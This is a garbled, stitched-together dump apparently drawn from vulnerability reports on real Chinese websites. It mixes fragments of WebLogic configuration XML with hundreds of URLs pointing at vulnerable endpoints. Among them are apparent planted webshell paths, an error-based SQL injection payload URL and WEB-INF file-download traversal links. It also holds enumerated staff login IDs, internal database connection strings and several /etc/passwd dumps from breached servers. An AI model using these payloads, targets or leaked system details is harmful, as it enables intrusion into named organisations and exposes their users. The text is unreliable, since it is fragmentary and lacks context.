xmlns:xac="http://**.**.**.**/weblogic/security/xacml xsi:type="xac:xacml-authorizerType sec:authorizer sec:adjudicator xsi:type="wls:default-adjudicatorType sec:adjudicator sec:credential-mapper xsi:type="wls:default-credential-mapperType sec:credential-mapper sec:cert-path-provider xsi:type="wls:web-logic-cert-path-providerType sec:cert-path-provider sec:cert-path-builder sec:cert-path-builder sec:name sec:name sec:password-validator xmlns:pas="http://**.**.**.**/weblogic/security/providers/passwordvalidator xsi:type="pas:system-password-validatorType sec:name sec:name pas:min-password-length pas:min-password-length pas:min-numeric-or-special-characters pas:min-numeric-or-special-characters sec:password-validator http://58.52.163.234:7001/ da1e:40c2:10cb:37c2:3f57:ffec]:7001 ed89:9ec8:ea98%12]:7001 http://ye.ysh365.com/index.php/manage/Appraise/Admin http://222.73.173.5:7001/ http://60.28.104.133:9060/yyoa/ext/https/getSessionList.jsp?cmd=getAll http://**.**.**.**/loginAction.do?actionType=login&condition.action=homepage&jsessionid=存在命令执行漏洞 http://www.xiangyahui.com/mobile_user_userinfo?userid=3000 http://27.223.70.33:7003/rrs/security/loginInit.action http://xmlns.oracle.com/weblogic/domain xmlns:sec="http://xmlns.oracle.com/weblogic/security xmlns:wls="http://xmlns.oracle.com/weblogic/security/wls xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance xsi:schemaLocation="http://xmlns.oracle.com/weblogic/security/xacml http://xmlns.oracle.com/weblogic/security/xacml/1.0/xacml.xsd http://xmlns.oracle.com/weblogic/security/providers/passwordvalidator http://xmlns.oracle.com/weblogic/security/providers/passwordvalidator/1.0/passwordvalidator.xsd http://xmlns.oracle.com/weblogic/domain http://xmlns.oracle.com/weblogic/1.0/domain.xsd http://xmlns.oracle.com/weblogic/security http://xmlns.oracle.com/weblogic/1.0/security.xsd http://xmlns.oracle.com/weblogic/security/wls http://xmlns.oracle.com/weblogic/security/wls/1.0/wls.xsd sec:authentication-provider xsi:type="wls:default-authenticatorType sec:authentication-provider sec:authentication-provider xsi:type="wls:default-identity-asserterType sec:active-type sec:active-type sec:authentication-provider sec:role-mapper xmlns:xac="http://xmlns.oracle.com/weblogic/security/xacml xsi:type="xac:xacml-role-mapperType sec:role-mapper sec:authorizer xmlns:xac="http://xmlns.oracle.com/weblogic/security/xacml xsi:type="xac:xacml-authorizerType sec:authorizer sec:adjudicator xsi:type="wls:default-adjudicatorType sec:adjudicator sec:credential-mapper xsi:type="wls:default-credential-mapperType sec:credential-mapper sec:cert-path-provider xsi:type="wls:web-logic-cert-path-providerType sec:cert-path-provider sec:cert-path-builder sec:cert-path-builder sec:name sec:name sec:password-validator xmlns:pas="http://xmlns.oracle.com/weblogic/security/providers/passwordvalidator xsi:type="pas:system-password-validatorType sec:name sec:name pas:min-password-length pas:min-password-length pas:min-numeric-or-special-characters pas:min-numeric-or-special-characters sec:password-validator http://**.**.**.**/App_Web/W_AdvancedSearch_Individual.aspx http://**.**.**.**/wj/Page/Wap/ActInduce.aspx?activtycode=123 http://**.**.**.**/live/zh/content.php?section_id=6 http://**.**.**.**/news_detail.php?id=79 http://x.youxinpai.com/login/?return=s http://123.127.246.34/index.php?g=Wap&m=Dining&a=ShowDetail&id=2 http://weixintest.newchinalife.com/uploads/a/admin/8/7/b/2/56712d732270b.php url:http://book.fwxgx.com/orders/5803 http://**.**.**.**/ldims/login.jsp http://**.**.**.**/ldims/webtopo/sqlnet.log http://baike.baidu.com/crossdomain.xml http://dk.360che.com/viewthread.php?tid=946240#bbsindex_new http://**.**.**.**/PriceList.aspx?y=2015&m=9&c=1300060000 http://ir.vodone.com/c/ir_annouce.php?year=2015 http://ir.vodone.com/s/ir_annouce.php?year=2015 http://ir.vodone.com/html/ir_annouce.php?year=2015 http://**.**.**.**/charter/subpage06_d.php?id=210 http://**.**.**.**/en/Event_WhatsNew_Details.php?id=3 http://**.**.**.**/classtypesdetail.php?course=1500&mid=8&msid=48 http://**.**.**.**/m/event/applier http://**.**.**.**/bugs/wooyun-2010-0152457 https://renzheng.glodon.com/app/exam/login/Login/login.do http://jn.glodon.com/admin/ http://file3.glodon.com/ http://comment.yaolan.com/zhuanti/MessageBoard.aspx?Topic=abc_dvd&Color= http://**.**.**.**/c/mgt_news_details.php?itemid=466&page=1 sboss.ear/webapp.war http://**.**.**.** http://www.sppm.tsinghua.edu.cn/articles/upload.jsp处可以上传文件 http://**.**.**.**/m/search.aspx http://www.panda.tv/crossdomain.xml http://www.panda.tv/watchhistory获取历史记录 http://**.**.**.**/thirdparty/ueditor/jsp/getRemoteImage.jsp?upfile=http://**.**.**.**/sex.jsp%23.jpg http://118.144.75.72/platform/ueditor/jsp/getRemoteImage.jsp?upfile http://wooyun.org/bugs/wooyun-2015-0129588 http://**.**.**.**/ jdbc:oracle:thin:@**.**.**.**:1521:wwcx http://**.**.**.**/ui/indexlis.jsp jdbc:oracle:thin:@**.**.**.**:1521/xzt http://www.cnblogs.com/bundles/blog-common.js?v=vfyaOatuLMyj5RwdSGYAF5dymrCScyt2dbQ1pH4gldc1 http://e.zznissan.com.cn/event/20130909/news/artical.php?sortid=4&arcid=31 http://e.zznissan.com.cn/admin/console/?c=login&a=log http://**.**.**.**/OuterNetWeb/appMain?service=index&func=aIndex http://**.**.**.**/servicehall/ http://**.**.**.**/wa/wa/ma3.jsp http://**.**.**.** http://**.**.**.** http://www.scu.edu.cn/WEB-INF/web.xml http://www.scu.edu.cn/WEB-INF/applicationContext.xml http://www.scu.edu.cn//WEB-INF%2fweb.xml http://**.**.**.** http://**.**.**.**/8thManage/index.jsp http://121.8.157.211 http://121.8.157.211/wa/wa/ma3.jsp http://vip.crocs.cn http://**.**.**.**/login.php http://mgdz.ljlj.cc/account/login.php http://zabbix.glodon.com/index.php http://103.47.87.72:7001/console/login/LoginForm.jsp root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin nscd:x:28:28:NSCD Daemon:/:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin rpc:x:32:32:Portmapper user:/:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin pcap:x:77:77::/var/arpwatch:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin rpcuser:x:29:29:RPC User:/var/lib/nfs:/sbin/nologin nfsnobody:x:4294967294:4294967294:Anonymous User:/var/lib/nfs:/sbin/nologin dbus:x:81:81:System bus:/:/sbin/nologin avahi:x:70:70:Avahi daemon:/:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin avahi-autoipd:x:100:101:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin xfs:x:43:43:X Server:/etc/X11/fs:/sbin/nologin gdm:x:42:42::/var/gdm:/sbin/nologin sabayon:x:86:86:Sabayon user:/home/sabayon:/sbin/nologin oprofile:x:16:16:Special OProfile:/home/oprofile:/sbin/nologin admin:x:500:500::/home/admin:/bin/bash oracle:x:501:501::/home/oracle:/bin/bash encap:Ethernet AE:8B:41:F6:AD addr:190.7.10.18 Bcast:190.7.255.255 Mask:255.255.0.0 fe41:f6ad/64 Scope:Link MTU:1500 packets:445141104 packets:456627675 txqueuelen:1000 http://**.**.**.**/manage/login.aspx http://**.**.**.**/sc/ir_announce.php?year=2014 http://**.**.**.**/tc/ir_announce.php?year=2014 http://**.**.**.**/html/ir_announce.php?year=2014 http://www.idtsec.com/ http://www.zkbh.com.cn/ http://www.zkbh.com.cn/search.asp http://**.**.**/netSales/pagesCar/SimpleCarEdit.do http://**.**.**/netSales/one8.jsp http://106.37.195.143/clppay/jsp/homecon.jspx shell:http://106.37.195.143/clppay/jsp/homecon.jspx google:intitle:企业代理服务器--中国移动 http://**.**.**.**/%c0%ae/WEB-INF/monitor.xml http://124.127.187.4:8080/qcar/(ip与之前提的不一样) http://manager.crvole.com.cn/index.php?r=site/login http://124.251.36.95/TCL http://182.254.162.32:7001/console/login/LoginForm.jsp root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin abrt:x:173:173::/etc/abrt:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin saslauth:x:499:76:"Saslauthd saslauth:/sbin/nologin postfix:x:89:89::/var/spool/postfix:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin tcpdump:x:72:72::/:/sbin/nologin dbus:x:81:81:System bus:/:/sbin/nologin rtkit:x:498:499:RealtimeKit:/proc:/sbin/nologin pulse:x:497:498:PulseAudio Daemon:/var/run/pulse:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin gdm:x:42:42::/var/lib/gdm:/sbin/nologin avahi-autoipd:x:170:170:Avahi Stack:/var/lib/avahi-autoipd:/sbin/nologin oracle:x:500:500::/home/oracle:/bin/bash weblogic:x:501:503::/data/weblogic:/bin/bash hssale:x:505:500::/data/hssale:/bin/bash tuxedo:x:504:500::/data/tuxedo:/bin/bash encap:Ethernet addr:10.232.6.108 Bcast:10.232.7.255 Mask:255.255.254.0 MTU:1500 packets:202837563 packets:27915347 txqueuelen:1000 http://www.minmindai.com/Franchise/index/city_s_id/22*.html URL:http://life.ufh.com.cn/guidelist.php?g_id=10 http://life.ufh.com.cn/guidelist.php?g_id=10 http://**.**.**.** http://**.**.**.**/coremail/login.jsp可以愉快的去爆破了 https://m.sinochem.com http://**.**.**.**/ http://qinggan.baihe.com/ask/detail/11.html http://**.**.**.**//manager/html http://**.**.**.**/doctor/dept.aspx?dept=23 e832:526d:205f%12 jdbc:jtds:sqlserver**.**.**.**:51433;DatabaseName=twdb jdbc:oracle:thin:@**.**.**.**:1521:SUNCN jdbc:oracle:thin:@**.**.**.**:1521:testpro jdbc:dm**.**.**.**:12345/frontpc http://**.**.**.** jdbc:oracle:thin:@**.**.**.**:1521:ahsxtest jdbc:oracle:thin:@**.**.**.**:1521:AHXDJTOA jdbc:oracle:thin:@**.**.**.**:1521:devmain http://**.**.**.**/pharmacy/ContentAspx/ViewCotent.aspx?pk=15062300001&isClass=10&setTable=2 http://fanmei.zhuzher.com:80/ http://cbs.zhuzher.com:15018/ com:15018 http://218.193.160.77/WEB-INF/web.xml http://218.193.160.77/WEB-INF/classes/jdbc.properties http://218.193.160.77/WEB-INF/classes/hibernate.cfg.xml http://redmine.shisu.edu.cn/.svn/entries encap:Ethernet AE:8B:41:F6:AD addr:190.7.10.18 Bcast:190.7.255.255 Mask:255.255.0.0 fe41:f6ad/64 Scope:Link MTU:1500 packets:445141104 packets:456627675 txqueuelen:1000 xxx:7002 http://**.**.**.**/?m=content&c=index&a=download&cat_id=26&menu_id=24 http://223.223.197.242:8080/console http://www.xintai.com/collect/receiver.do http://**.**.**.**/sldj/201304/t20130415_1420.html http://**.**.**.**/jsp/login/relogin.jsp http://**.**.**.**/jsp/login/relogin.jsp http://**.**.**/account/login_ http://**.**.**/account/login_ http://**.**.**/account/login_ http://cbs.zhuzher.com:15018/ com:15018 http://124.127.49.183:8099/gms-v2/ http://124.127.49.183:8099/ http://www.outao.eu:81/ http://www.softresource.cn/uams/api/manager/login http://m.jiashuangkuaizi.com/.svn/entries https://**.**.**/debug/_ http://beta.m.jiashuangkuaizi.com/Operation/login http://rzrq.263.net http://rzrq.263.net:7001/ http://ask.huatu.com/ http://agency.1jiajie.com http://**.**.**.**/seeyon/ http://**.**.**.**/seeyon/management/index.jsp http://**.**.**.**/seeyon/logs/login.log http://bbs.feidee.com/forum.php https://m.shengri.cn/user/login http://**.**.**.**/wssw/jsp/zhcx/ssxxcx/nsrzg_001.jsp http://sq.mengniu.com.cn/File/ http://b2b.emaotai.cn http://gksx.free.ezvpn.cn:8080/yyoa/ http://gksx.free.ezvpn.cn:8080/yyoa/common/js/menu/test.jsp?doType=101&S1=select%20@@datadir http://mall.lakala.com/orders/vieworder?ot=1433293292418&orderId=20150603303235 mall.lakala.com/purchases/cancelorder?orderId=20140301195050 http://mall.lakala.com/orders/vieworder?ot=1393892046389&orderId=20140301195050 http://**.**.**.** http://**.**.**.**/articleview.php?id=1396 http://oa.app.minshenglife.com:89/m1/login.do http://hsj.umpay.com/Conf/ http://**.**.**.**:18080/ http://mis.hongfa.cn https://124.160.68.233 http://wear.fh21.com.cn http://ec.ecaic.com/ec/ http://ec.ecaic.com/ec/login.do?action=download&fileUrl=%2FWEB-INF/&fileName=web.xml http://www.ecaic.com:8070/cardactive/fileDownLoadAction.do?action=download&fileUrl=/WEB-INF/&fileName=web.xml http://www.ecaic.com:8070/cardactive/fileDownLoadAction.do?action=download&fileUrl=%2Fjsp%2F&fileName=default.jsp http://**.**.**.**/ http://oa.gkzj.com/yyoa/HJ/iSignatureHtmlServer.jsp?COMMAND=DELESIGNATURE&DOCUMENTID=1&SIGNATUREID=2 http://oa.gkzj.com/yyoa/HJ/iSignatureHtmlServer.jsp?COMMAND=DELESIGNATURE&DOCUMENTID=1&SIGNATUREID=2%27%20and%20%28select%201%20from%20%28select%20count%28*%29,concat%28version%28%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29--%20- http://www.ttkdex.com.hk/Page/Logistics/InspectMessage.aspx?StorageNumber= https://meican.com/settings http://oa.caitc.cn/ http://www.cnpicl.com.cn:8080/yyoa/ http://www.cnpicl.com.cn:8080/yyoa/common/selectPersonNew/initData.jsp?trueName=1 http://www.cnpicl.com.cn:8080/yyoa/common/SelectPerson/reloadData.jsp http://www.cnpicl.com.cn:8080/yyoa/indexPass.jsp?id=chenjun http://www.cnpicl.com.cn:8080/yyoa/indexPass.jsp?id=chenwei http://www.cnpicl.com.cn:8080/yyoa/indexPass.jsp?id=hechao http://www.cnpicl.com.cn:8080/yyoa/indexPass.jsp?id=hefeng http://www.cnpicl.com.cn:8080/yyoa/indexPass.jsp?id=huangwei http://www.cnpicl.com.cn:8080/yyoa/indexPass.jsp?id=hujing http://www.cnpicl.com.cn:8080/yyoa/indexPass.jsp?id=liangchao http://www.cnpicl.com.cn:8080/yyoa/indexPass.jsp?id=lihaiying http://www.cnpicl.com.cn:8080/yyoa/indexPass.jsp?id=lilei http://www.cnpicl.com.cn:8080/yyoa/indexPass.jsp?id=limingming http://www.cnpicl.com.cn:8080/yyoa/indexPass.jsp?id=liuqiang http://www.cnpicl.com.cn:8080/yyoa/indexPass.jsp?id=liurui http://www.cnpicl.com.cn:8080/yyoa/indexPass.jsp?id=liushuai http://www.cnpicl.com.cn:8080/yyoa/indexPass.jsp?id=liuyang http://www.cnpicl.com.cn:8080/yyoa/indexPass.jsp?id=liuyong http://www.cnpicl.com.cn:8080/yyoa/indexPass.jsp?id=liuyuan http://www.cnpicl.com.cn:8080/yyoa/indexPass.jsp?id=liwei http://www.cnpicl.com.cn:8080/yyoa/indexPass.jsp?id=lixia http://www.cnpicl.com.cn:8080/yyoa/indexPass.jsp?id=liyuanyuan http://www.cnpicl.com.cn:8080/yyoa/indexPass.jsp?id=wanghaiyan http://www.cnpicl.com.cn:8080/yyoa/indexPass.jsp?id=wangli http://www.cnpicl.com.cn:8080/yyoa/indexPass.jsp?id=wangna http://www.cnpicl.com.cn:8080/yyoa/indexPass.jsp?id=wangxiaodan http://www.cnpicl.com.cn:8080/yyoa/indexPass.jsp?id=wangxiaoming http://www.cnpicl.com.cn:8080/yyoa/indexPass.jsp?id=wangzhiqiang http://www.cnpicl.com.cn:8080/yyoa/indexPass.jsp?id=wuying http://www.cnpicl.com.cn:8080/yyoa/indexPass.jsp?id=xuying http://www.cnpicl.com.cn:8080/yyoa/indexPass.jsp?id=yangping http://www.cnpicl.com.cn:8080/yyoa/indexPass.jsp?id=zhangchunmei http://www.cnpicl.com.cn:8080/yyoa/indexPass.jsp?id=zhanghang http://www.cnpicl.com.cn:8080/yyoa/indexPass.jsp?id=zhangminghua http://www.cnpicl.com.cn:8080/yyoa/indexPass.jsp?id=zhangshuo http://www.cnpicl.com.cn:8080/yyoa/indexPass.jsp?id=zhangwei http://www.cnpicl.com.cn:8080/yyoa/indexPass.jsp?id=zhangwenhua http://www.cnpicl.com.cn:8080/yyoa/indexPass.jsp?id=zhangyan http://www.cnpicl.com.cn:8080/yyoa/indexPass.jsp?id=zhaogang http://www.cnpicl.com.cn:8080/yyoa/indexPass.jsp?id=zhaojun http://www.cnpicl.com.cn:8080/yyoa/indexPass.jsp?id=zhouxin http://www.cnpicl.com.cn:8080/yyoa/indexPass.jsp?id=zhupeng http://wiki.jiashuangkuaizi.com http://27.223.70.113:7003/mainFrame.html http://xmlns.oracle.com/weblogic/domain xmlns:sec="http://xmlns.oracle.com/weblogic/security xmlns:wls="http://xmlns.oracle.com/weblogic/security/wls xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance xsi:schemaLocation="http://xmlns.oracle.com/weblogic/security/xacml http://xmlns.oracle.com/weblogic/security/xacml/1.0/xacml.xsd http://xmlns.oracle.com/weblogic/security/providers/passwordvalidator http://xmlns.oracle.com/weblogic/security/providers/passwordvalidator/1.0/passwordvalidator.xsd http://xmlns.oracle.com/weblogic/domain http://xmlns.oracle.com/weblogic/1.0/domain.xsd http://xmlns.oracle.com/weblogic/security http://xmlns.oracle.com/weblogic/1.0/security.xsd http://xmlns.oracle.com/weblogic/security/wls http://xmlns.oracle.com/weblogic/security/wls/1.0/wls.xsd sec:authentication-provider xsi:type="wls:default-authenticatorType sec:authentication-provider sec:authentication-provider xsi:type="wls:default-identity-asserterType sec:active-type sec:active-type sec:authentication-provider sec:role-mapper xmlns:xac="http://xmlns.oracle.com/weblogic/security/xacml xsi:type="xac:xacml-role-mapperType sec:role-mapper sec:authorizer xmlns:xac="http://xmlns.oracle.com/weblogic/security/xacml xsi:type="xac:xacml-authorizerType sec:authorizer sec:adjudicator xsi:type="wls:default-adjudicatorType sec:adjudicator sec:credential-mapper xsi:type="wls:default-credential-mapperType sec:credential-mapper sec:cert-path-provider xsi:type="wls:web-logic-cert-path-providerType sec:cert-path-provider sec:cert-path-builder sec:cert-path-builder sec:name sec:name sec:password-validator xmlns:pas="http://xmlns.oracle.com/weblogic/security/providers/passwordvalidator xsi:type="pas:system-password-validatorType sec:name sec:name pas:min-password-length pas:min-password-length pas:min-numeric-or-special-characters pas:min-numeric-or-special-characters sec:password-validator XX:PermSize=512m XX:MaxPermSize=1024m XX:PermSize=512m XX:MaxPermSize=1024m http://180.168.145.154:7001/Chinalife/main/Login.html http://180.168.145.154:7001/uddiexplorer/sss.jsp http://180.168.145.154:7001/uddiexplorer/out.jsp http://video.qingdaonews.com/cms/frame/login.jsp http://**.**.**.**:8080/bocoit/common.asp?id=4182&sid=7 www.boco.com.cn:8080 http://m.bee.baidu.com/ http://m.bee.baidu.com/index.php?r=mobile%2Fcost%2Fupdate&id=XXXX http://m.bee.baidu.com/index.php?r=mobile%2Fcost%2Fdelete&id=XXXX http://m.bee.baidu.com/index.php?r=mobile%2Fpoint-poi%2Fupdate&id=XXXX http://m.bee.baidu.com/index.php?r=mobile%2Fpoint-poi%2Fdelet&id=XXXX http://open.dealer.auto.sohu.com/api/dealerForDbModelPage?modelId=4835&cityCode=510100&_=1450903117507&callback=Data.parse4S http://www.netentsec.com/index.php?m=member&c=index&a=login http://**.**.**.**河南省国税局移动办税平台站点存在weblogic的反序列化 https://r2mp.huawei.com/r2mp/ https://r2mp.huawei.com/wa/wa/pwn.jsp https://r2mp.huawei.com/wa/wa/ma3.jsp http://yyyl.swu.edu.cn/ http://**.**.**.**/ http://**.**.**.**/web/web/web/index http://**.**.**.**/ http://**.**.**.**/asp/info.asp?topic=NW&classifyid=&csfilter=&dtfilter=articleinfoweb.infovalue@%273%27&page=&from= http://www.hi0452.com/pay/order.php http://**.**.**.**/bugs/wooyun-2015-0139829 http://**.**.**.**:7001/etrading/etrading.jsp http://**.**.**.**/bugs/wooyun-2015-0143477 http://**.**.**.**/listDetail.asp?c_no=00229 http://www.kela.cn/index.php?m=admin&c=account&a=index http://**.**.**.**/bugs/wooyun-2015-0143515 http://www.grhao.com/index.htm http://game.weibo.com/avatar/interface/shareAvatar http://game.weibo.com/avatar/interface/shareAvatar http://app.wcdn.cn.zhchbin.xyz/ http://**.**.**.**/bugs/wooyun-2015-0140859 http://123.126.34.67:7001/ http://123.126.34.67:7003/ http://123.126.34.67:7001/uddiexplorer/sss.jsp http://xxx.xxx.xxx.xxx:7002/ index.php/index/index.html http://www5.nenu.edu.cn/professor/pro/yul/c_kygz.php?id=319 url:http://211.152.53.60:8080/websource/docroot/FD/fdlogin.jsp http://**.**.**.**/eoffice_web/index.php?s=/admin/settings/register.html http://**.**.**.**/eoffice_web/index.php?s=/admin/update/update_list.html http://**.**.**.**/index.php/webgame/index/cid/* http://**.**.**.**/ http://**.**.**.**/login.do http://eagle.tcl.com/Upfile_Article.asp jdbc:oracle:thin:@10.1.60.80:1521:orcl ldap://192.168.165.62:389 http://**.**.**.**/OrderDetail.aspx?sid=1614100&hotelcode=PEKABP http://**.**.**.**/OrderDetail.aspx?sid=1614101&hotelcode=PEKABP http://**.**.**.**/OrderDetail.aspx?sid=1614102&hotelcode=PEKABP http://**.**.**.**/OrderDetail.aspx?sid=1614103&hotelcode=PEKABP http://**.**.**.**/OrderDetail.aspx?sid=1614104&hotelcode=PEKABP http://**.**.**.**/OrderDetail.aspx?sid=1614105&hotelcode=PEKABP http://**.**.**.**/OrderDetail.aspx?sid=1614173&hotelcode=PEKABP http://**.**.**.**/OrderDetail.aspx?sid=1614311&hotelcode=PEKABP http://**.**.**.**/OrderDetail.aspx?sid=1614312&hotelcode=PEKABP http://**.**.**.**/OrderDetail.aspx?sid=1614313&hotelcode=PEKABP http://oa.tianjimedia.com//yyoa/assess/js/initDataAssess.jsp http://www.abc360.com/ThinkPHP/Library/Vendor.tar.gz http://182.92.119.216:5678/ http://www.abc360.com//wage/Log/lastSql.txt http://**.**.**.** http://ouing.cn/manage/login.asp http://ouing.cn/manage/myfck/editor/filemanager/browser/default/browser.html?Connector=../../connectors/asp/connector.asp http://www.etraveller.cn/news_v.asp?id=838 http://**.**.**.**/portal/web/main/index.action https://**.**.**.** http://**.**.**.**:8084/ylnsyhmis/manage/user-manage!login.action http://**.**.**.**:8084/ylnsyhmis/bak.jsp http://60.8.88.179:6666/seeyon/main.do http://218.106.130.43/sso/logon http://58.254.214.136/ http://58.254.214.132/ http://online.greatlife.cn:8001/greatlife/login.do http://**.**.**.**/new.asp?id=1603 http://58.254.214.131/ http://zf.chinapost.com.cn http://newmail.19lou.com/,果然,你们的邮箱已经换了 http://newmail.19lou.com/include/userlist.txt,所有的用户列表 https://owa.tcl.com/ http://114.212.191.46/ http://inquiry.chinalifepension.com:7001/netcust/IndexAction.do?action=psnLogin root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbinlogin daemon:x:2:2:daemon:/sbin:/sbinlogin adm:x:3:4:adm:ar/adm:/sbinlogin sync:x:5:0:sync:/sbin:/bin/sync mail:x:8:12:mail:ar/spool/mail:/sbinlogin ftp:x:14:50:FTP User:ar/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbinlogin nscd:x:28:28:NSCD Daemon:/:/sbinlogin vcsa:x:69:69:virtual owner:/dev:/sbinlogin ntp:x:38:38::/etc/ntp:/sbinlogin pcap:x:77:77::ar/arpwatch:/sbinlogin dbus:x:81:81:System bus:/:/sbinlogin avahi:x:70:70:Avahi daemon:/:/sbinlogin rpc:x:32:32:Portmapper user:/:/sbinlogin mailnull:x:47:47::ar/spool/mqueue:/sbinlogin smmsp:x:51:51::ar/spool/mqueue:/sbinlogin apache:x:48:48:Apache:ar/www:/sbinlogin sshd:x:74:74:Privilege-separated SSH:ar/empty/sshd:/sbinlogin rpcuser:x:29:29:RPC User:arb/nfs:/sbinlogin nfsnobody:x:4294967294:4294967294:Anonymous User:arb/nfs:/sbinlogin xfs:x:43:43:X Server:/etc/X11/fs:/sbinlogin haldaemon:x:68:68:HAL daemon:/:/sbinlogin avahi-autoipd:x:100:101:avahi-autoipd:arb/avahi-autoipd:/sbinlogin gdm:x:42:42::ar/gdm:/sbinlogin sabayon:x:86:86:Sabayon user:/homebayon:/sbinlogin oracle:x:500:500::/export/home/oracle:/bin/bash probe:x:501:100::/export/home/probe:/bin/bash dninms:x:502:100::/export/home/dninms:/bin/bash admin:x:503:501::/export/home/admin:/bin/bash cas:x:504:100::/export/home/cas:/bin/bash zzzxj:x:505:100::/export/home/zzzxj:/bin/bash http://219.143.162.220:7001/ui/ http://www.befun.me/index.php http://qa.tank.duowan.com/manage/.svn/entries http://qa.tank.duowan.com/manage/sql/dbcfg.py http://202.104.30.81/ http://114.251.203.85:7001/huatai/agent/login.do;jsessionid=0Qx8W7LTHQpN1K9pyp55fSYLrRN5KG4L482m1dmmJtqBt7mwCyZj!1058723258?authenticationEntry=true URL:http://www1.southernfund.com:443/nfjjRecruitSystem/toregister.action确定是否存在struts2开启debug可执行任意代码 http://1.202.242.119:7001/huatai4bank/agent/login.do?authenticationEntry=true http://101.251.192.28:8080 http://**.**.**.** http://rdcrm.midea.com.cn:9082 http://jscrm.midea.com.cn:8083 http://www.axatp.com/ http://180.168.192.29/ http://star.pflife.com.cn/star/ f873:b49d:c79d:7fb9%11 b4a8:29af:f3:1ae3:3f57:fe39 f3:1ae3:3f57:fe39%19 http://**.**.**.**/sciencefair_article.asp?ItemID=79 http://**.**.**.**/information_article.asp?ItemID=172 http://**.**.**.**/scienceedu_article.asp?ItemID=163 http://**.**.**.**/fair_article.asp?ItemID=184 http://**.**.**.**/ceremony_article.asp?ItemID=199 http://**.**.**.**/news_content.asp?ItemID=290 http://**.**.**.**/info_Doc.asp?ItemID=69 http://**.**.**.**/otherZ.asp?ItemMenuAID=139 http://**.**.**.**/news_list.asp?JumpPage=2 http://**.**.**.**/otherF.asp?ItemMenuBID=111 http://**.**.**.**/topic_e.asp?ItemPlanID=107 http://**.**.**.**/bulletin_content.asp?ItemID=284 http://**.**.**.**/award_content.asp?ItemID=263 http://**.**.**.**/schedule_content.asp?ItemID=72 http://**.**.**.**/exhibits_article.asp?ItemID=194 http://**.**.**.**/press_list.asp?ItemPressCatID=7 http://**.**.**.**/press_article.asp?ItemID=289 http://61.163.100.203:8888/control/loginUI http://**.**.**.**/job_detail_ch.php?temp_id=1209 http://**.**.**.** http://**.**.**.**:8000/ http://**.**.**.**:8000/w.jsp http://tongxue.open.com.cn:15000/login/index.html http://sto.cn/news_detail.asp?id=101808 http://sto.cn/admin11ww/ http://58.252.101.32:81/ http://58.20.40.247 http://group.cnblogs.com/103902 http://**.**.**.**/www/xb/kqx/ReadNews1.asp?NewsID=1468&BigClassName=%EF%BF%BD%EF%BF%BD%D5%BE%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD&SmallClassName=0&SpecialID=0 http://**.**.**.**/www/xb/kqx/admin/login.asp https://**.**.**.**/wuhongyang/tpaas-web/blob/9548461d5fb1fca66fd17c2d3b92b8a8b3323d4b/src/test/resources/webapp/WEB-INF/config/mailServer.properties http://**.**.**.**)主站存在多个SQL注入点,可直接获取数据库信息。 http://**.**.**.**/e_second.php?id=44 http://**.**.**.**/t_second.php?id=29 http://**.**.**.**/s_second.php?id=9 http://dcapp.midea.com.cn/ http://smartvideo.youku.com/#/home http://**.**.**.**/ http://123.124.175.241:8080/uddi/_x.jsp http://123.124.175.235/uddi/_x.jsp http://123.124.175.230:7001/uddi/_x.jsp http://219.143.213.118/ https://**.**.**.**/guest/register?type=retievePassword https://**.**.**.**/guest/register?type=retievePassword http://**.**.**.**:9000/ http://zx.hxlife.com http://joystu.com/ http://**.**.**.**:8080/bi_home/HomeAction_detailpage.do?NewsId=3538&MenuID=M011_002 http://www.chunbo.com/app/download https://github.com/wenjunyang/learn/blob/5232c958ea6b82ee94d671839c59841404037133/python/python_grammar/gzq_login.py http://180.168.145.162:7001/ChinalifeAuth/she22.jsp jdbc:sqlserver://10.24.51.5:1433 http://www.jsfxw.com http://www.jsfxw.com/sjsd/sdjs.asp?id=2 http://**.**.**.**/search1.asp http://**.**.**.**/tb/show.asp?id=20516*&pageid=1 http://**.**.**.**/tb/UserInfo.asp?uid=1* 